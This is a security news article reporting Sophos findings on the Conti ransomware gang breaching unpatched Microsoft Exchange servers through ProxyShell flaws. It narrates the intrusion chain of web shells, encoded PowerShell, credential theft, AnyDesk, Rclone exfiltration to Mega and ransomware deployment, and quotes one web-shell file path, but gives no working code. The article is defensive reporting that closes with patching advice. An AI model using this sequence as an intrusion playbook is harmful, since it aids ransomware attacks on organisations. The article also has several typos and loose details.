Monday, May 19, 2025
HomeCVE/vulnerabilityConti Ransomware Gang Hacking Microsoft Exchange Servers Using ProxyShell Exploits

Conti Ransomware Gang Hacking Microsoft Exchange Servers Using ProxyShell Exploits

Published on

SIEM as a Service

Follow Us on Google News

Researchers uncovered a new ongoing attack by Conti Ransomware Gang that utilized the ProxyShell to target the organization networks.

ProxySell is an exploit written to abuse the Microsoft Exchange vulnerabilities reported over the past months, also it was patched by Microsoft and released an update in May 2021 under patch Tuesday. 

Conti is one of the ruthless ransomware gangs, and The FBI reported that the gang was involved with more than 400 high-profile cyber attacks with demands as high as $25 million.

- Advertisement - Google News

New ProxySell attack is employed by the Ransomware groups, and the same exploit was already utilized by the LockFile ransomware, now it is used by the Conit Ransomware.

Researchers from Sophos believe that the attackers have gained experience with the techniques, their dwell time before launching the final ransomware payload on target networks.

Also Conti ransomware gain access to the targeted network under a minute and set up a remote Web Shell. Following this, they installed a second web shell that acts as a backup.

30 min later, Attackers generate a complete list of computers deployed in the targeted network, domain controller, and domain admins.

To execute the commands, it takes an hour to obtain the credentials of the domain administrator accounts, in another 48 hours, they exfiltrated about 1 Terabyte of data, and finally, they deployed the Conti ransomware to every machine on the network within 48 hours.

Technical Analysis

A Chain of Microsoft exchange vulnerabilities(CVE-2021-34473CVE-2021-34523CVE-2021-31207) was fixed in the recent April, May Exchange Server cumulative update, which leads to the organization upgrade their exchange server.

But some of the organizations leaving the exchange server without applying the patch due to email downtime, and it leaves them to attackers who used to scan the vulnerable systems.

Once the attackers successfully entered into the network, attackers create a new mailbox for “administrator,” and placing a new role with the help of Microsoft Exchange “cmdlets that help them to execute the Shell commands remotely.

\\127.0.0.1\C$\inetpub\wwwroot\aspnet_client\aspnetclient_log.aspx

Later, the attackers create a web shell in the localhost address of the sever and execute a PowerShell script which is encoded in base64.

In the next stage, attack utilizing the encoded command to abuses Service Control Manager to execute a directory look-up on the directory where the web shell was dropped.

In the Reconnaissance Phase, attackers another PowerShell command to retrieving the list of domain computers from the text file and collect the information about the network configuration, domain administrators, users actively connected to the system, process ID of the Local Security Authority Subsystem Service. Sophos said.

Once they have collected the all necessary data, the attacker dropped an executable file (SVN.exe) and executed it on the system then establish a connection to the C2 server which is placed in Finland.

Once the initial stage of compromise was done, attackers stealing the credentials then began lateral movement using an existing domain administrator account that they had cracked. 

“That account was used to create an RDP connection from the Exchange server to another server. One minute later, the logs of that server show the domain admin account downloading and installing the AnyDesk remote desktop software as a service.”

Finally, attackers deployed the File copying utility called Rclone in multiple servers with the help of PowerShell file.

Later the date has been transferring to the Mega file-sharing service that includes addresses of remote drives and the username & password for that account.

Exactly 5th day since the intimal compromiseConti actors began deploying ransomware and start the encrypt the files.

“Four batch scripts (called 1help.bat, 2help.bat, 3help.bat, and 4help.bat) were run from four servers. The batch files repeatedly invoked the ransomware executable (x64.exe), with each iteration targeting specific drives on every Windows system on the network by their default file sharing names “

ProxyShell and other attacks on known Microsoft Exchange vulnerabilities are extremely high now. Organizations are recommended to update and patch servers on-premises Exchange Server as soon as is possible.

Here are the recently released updates with the patches for the Microsoft Exchange server.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

VMware ESXi, Firefox, Red Hat Linux & SharePoint Hacked – Pwn2Own Day 2

Security researchers demonstrated their prowess on the second day of Pwn2Own Berlin 2025, discovering...

Critical WordPress Plugin Flaw Puts Over 10,000 Sites of Cyberattack

A serious security flaw affecting the Eventin plugin, a popular event management solution for...

Sophisticated NPM Attack Leverages Google Calendar2 for Advanced Communication

A startling discovery in the npm ecosystem has revealed a highly sophisticated malware campaign...

New Ransomware Attack Targets Elon Musk Supporters Using PowerShell to Deploy Payloads

A newly identified ransomware campaign has emerged, seemingly targeting supporters of Elon Musk through...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

VMware ESXi, Firefox, Red Hat Linux & SharePoint Hacked – Pwn2Own Day 2

Security researchers demonstrated their prowess on the second day of Pwn2Own Berlin 2025, discovering...

Critical WordPress Plugin Flaw Puts Over 10,000 Sites of Cyberattack

A serious security flaw affecting the Eventin plugin, a popular event management solution for...

Sophisticated NPM Attack Leverages Google Calendar2 for Advanced Communication

A startling discovery in the npm ecosystem has revealed a highly sophisticated malware campaign...